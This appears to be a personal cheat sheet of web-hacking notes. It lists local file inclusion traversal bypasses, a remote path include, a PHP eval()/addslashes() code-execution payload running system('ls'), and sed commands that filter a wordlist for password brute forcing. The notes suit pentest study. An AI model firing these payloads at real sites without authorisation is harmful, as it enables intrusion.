Skip to main content
  1. Hacking/

Web

Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Local file inclusion #

  • ../ specific find/replace can be bypassed with ..//
  • e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address/uploads/..//sys/class/net/eth0/address
  • Resolve a network path = http://host.tld/?page=//11.22.33.44/@OsandaMalith

PHP - Bypass eval() with addslashes() #

Where a value from a URL is passed through eval() with addslashes()

POC: ?str=${eval($_GET[1])}&1=phpinfo();

For example: GET /?format=${eval($_GET[1])}&1=system('ls');

https://www.programmersought.com/article/30723400042/

Command injection #

Characters #

See https://academy.hackthebox.com/module/109/section/1032

Resources #

File upload #

See https://academy.hackthebox.com/module/136/section/1291

Brute forcing #

If we know the password rules:

sed -ri '/^.{,7}$/d' words.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt # remove no special chars
sed -ri '/[0-9]+/!d' words.txt # remove no numbers